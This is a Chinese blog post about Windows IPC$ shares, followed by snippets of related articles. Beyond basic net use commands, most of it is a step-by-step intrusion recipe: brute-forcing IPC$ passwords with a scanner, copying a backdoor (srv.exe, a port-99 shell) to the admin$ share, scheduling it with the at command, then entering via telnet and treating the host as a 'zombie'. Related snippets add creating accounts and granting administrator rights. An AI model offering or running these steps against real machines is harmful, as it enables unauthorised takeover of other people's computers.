IPC$的使用和利用方法

最新推荐文章于 2022-11-05 14:59:00 发布
最新推荐文章于 2022-11-05 14:59:00 发布
阅读量3.5k 收藏 24
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42025840/article/details/83187511
版权

一、简介:

IPC共享命名的管道资源,为了让进程之间通信而开放的命名管道,可以通过验证用户名和密码获得相应的去权限,远程管理计算机和检查计算机的共享资源时使用的

二、相关基本命令:

1、建立空连接:

     net use \\IP\ipc$ "" /user:""   

2、建立非空连接:

     net use \\IP\ipc$ "密码" /user:" 用户名"

3、映射默认共享:

    net use  z:\\IP\c$ "密码" /user:"用户名"    将对方的c盘映射为自己的z盘

    如果已经和目标建立了ipc$连接,则可以使用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4、 删除一个ipc$连接

    net use c: /del  删除映射的c盘,其他盘以此类推

    net use *  /del   删除全部,会有提示要求按y确认 

    提示:对于不熟悉命令行操作的朋友来说,建立ipc$链接后,可以在“我的电脑”或“网上邻居”右键映射网络驱动器,效果一样

三、经典入侵模式

《流光》举例:

1、先用流光进行ipc扫描爆破(这里以用户名为administrator 密码为空的例子)

2、扫到账户密码进行ipc$连接   net   use \\127.0.0.1\IPC$ " " /user:"administrators"

3、将流光中自带的srv.exe上传上去     copy srv.exe \\127.0.0.1\admin$     (这里面的admin$是指用户的c:\winnt\system32\,大家还可以使用从c$ 和  d$ ,意思是c盘与d盘)

(srv.exe是用来在对方的电脑上建立一个99端口的shell )

4、net time   \\127.0.0.1  产看对方的主机的时间

 

5、at \\127.0.0.1 11:05  srv.exe 

(用at命令设置任务)

6、等到时间一到,at命令自动执行,这时我们就可以使使用telnet进行远程连接

但是上述方法每次登陆后都要重新进行连接

我们采用下一种方法  (直接建立一个telnet服务):

跟上述的步骤一致  只不过不上传srv.exe 上传ntlm.exe执行

7、这里附加说明后续步骤

8、C:\WINNT\system32>ntml  在对方的主机上启动ntml程序等到出现Done后就可以运行 net start telnet(在对方的主机上)

9、Telnet 127.0.0.1 进入对方主机就可以了 这下想干什么都行  哈哈哈

三、ipc经典入侵步骤

1、net use \\ip\\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功,连接你的肉鸡

 

我无风自画船
关注
IPC$共享和其他共享(C$、D$、Admin$)
谢公子的博客
10-18 1万+
目录 常见共享命令 IPC$ IPC$的利用条件 1:开启了139、445端口 2:目标主机开启了IPC$共享 IPC空连接 空连接可以做什么?(毫无作用) IPC$非空连接 IPC$非空连接可以做什么? dir命令(查看文件和目录) tasklist命令(查看进程) at命令(计划命令,可反弹shell) schtasks(计划任务) 关闭IPC$共享及其他共享 ...
IPC$命令详解
Kevin Wu的专栏
04-11 1724
平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?一 摘要二 什么是ipc$三 什么是空会话四 空会话可以做什么五 ipc$所使用的端口六 ipc管道在hack攻击中的意义七 ipc$连接失败的常见原因八 复制文件失败的原因九 关于at命令和x
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
05-17
et use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: net use h: \\ip\c$ 登陆后映射对方C:到本地为H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方到本地的为H:的映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户的属性 net localgroup administrators 用户名 /add 把"用户"添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 net start 查看开启了哪些服务 net start 服务名  开启服务;(如:net start telnet, net start schedule) net stop 服务名 停止某服务
详细了解IPC$命令, 防止IPC$入侵、攻击
言出必行
09-08 3673
IPC$命令详解  一 摘要  二 什么是ipc$  三 什么是空会话  四 空会话可以做什么  五 ipc$所使用的端口  六 ipc管道在hack攻击中的意义  七 ipc$连接失败的常见原因  八 复制文件失败的原因  九 关于at命令和xp对ipc$的限制  十 如何打开目标的IPC$共享以及其他共享  十一 一些需要shell才能完成的命令  十二 入侵中可能会用到的命令  十三 对比过
ipc$详细解释大全
!傲气雄鹰
11-04 2086
  目录 : 一 前言二 什么是ipc$三 什么是空会话四 空会话可以做什么五 ipc$连接所使用的端口六 ipc$连接在hack攻击中的意义七 ipc$连接失败的常见原因八 复制文件失败的原因九 如何打开目标的IPC$共享以及其他共享十 一些需要shell才能完成的命令十一 入侵中可能会用到的相关命令十二 ipc$完整入侵步骤祥解十三 如何防范ipc$入侵十四 ipc$入侵问答精选十五
net use 命令
weixin_34107955的博客
12-19 611
1)建立空连接:net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)2)建立非空连接:net use \\IP\ipc$ "密码" /user:"用户名" (同样有3个空格)3)映射默认共享:net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)如果已经和目标建...
Windows中IPC$服务及利用
2ed
11-13 4456
IPC$(Internet Process Connection) 共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 在WindowsXP windows7等系统中,隐藏着一种据说是可以“致命”的漏洞,它让很多人一听到就谈“虎”色变。在“我的电脑”上右击“管理”,依次...
ipc$连接+计划任务
qq_44881113的博客
09-14 3984
IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”,通过提供用户名密码建立了一条安全的、加密的、用于数据交换的通道。 关于IPC$+计划任务的横向,我们的目的非常明确: (1)首先建立向目标主机的IPC$连接 (2)其次把命令执行的脚本传到目标主机 (3)再次创建计划任务在目标机器上执行命令脚本 (4)最后过河拆桥删除IPC$连接 当然想要用IPC$来横向是有条件的: (1)目标机器没有禁用IPC连接,没有什么防火防盗拦截IPC连接,没有什么防火防盗拦.
防范IPC$远程入侵常用方法
最新发布
06-08
然而,攻击者也可以利用IPC$来进行远程入侵,进而获取目标计算机的控制权。以下是一些防范IPC$远程入侵的常用方法: 1. 禁用IPC$共享:在目标计算机上禁用IPC$共享,可以有效避免IPC$远程入侵。具体方法是,在目标...
IPC$知识详解(关于IPC$的所有知识)
12-03
我首先说IPC$不是漏洞,而是一项技术,这里面有关于它的详解.
学习笔记-IPC$(Internet Process Connection)
人饭子的博客
11-05 1659
IPC$(Internet Process Connection) IPC$ 的概念 IPC$(Internet Process Connection) 是共享 "命名管道" 的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限, 在远程管理计算机和查看计算机的共享资源时使用利用 IPC$,连接者可以与目标主机建立一个连接,利用这个连接,连接者可以得到目标主...
关于IPC$的使用笔记
weixin_34032621的博客
10-07 587
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统...
ipc\$详细用法介绍
07-16 1853
一 相关命令 1)建立空连接: net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 2)建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c
ipc$
xiaoxuetu_的博客
08-07 348
一、概述 IPC$(Internet Process Connection)是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机的共享资源时利用利用IPC$ 可以与目标主机建立一个空的连接而无需用户名和密码。  IPC$ 是 NT/2000 的一项新功能,它有一个特点,即在同一时间内,两个 IP 之间只允许建立一个连接。
一份详尽的IPC$入侵资料
Another's story
07-24 4486
  一 唠叨一下:网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).因此我写了这篇相当于解惑的教程.想把一些容易混淆
IPC简单使用
eli的博客
11-15 1176
正文 什么是IPCIPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 建立IPC连接 net use \\192.168.0.100\ipc$ "password" /user:"administrator" 删除...
ipc$是什么
03-07 1286
 用过Windows 2000的人都知道,Windows 2000的默认安装允许任何用户通过空用户连接(IPC$)得到系统所有账号和共享列表,这本来是为了方便局域网用户共享资源和文件的,但是任何一个远程 用户都可以利用这个空的连接得到你的用户列表。一些别有用心者会利用这项功能,查找我们的用户列表,并使用一些字典工具,对我们的主机进行攻击。另外,在 安装系统时创建一些隐藏的共享,通过“计算机名或IP
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值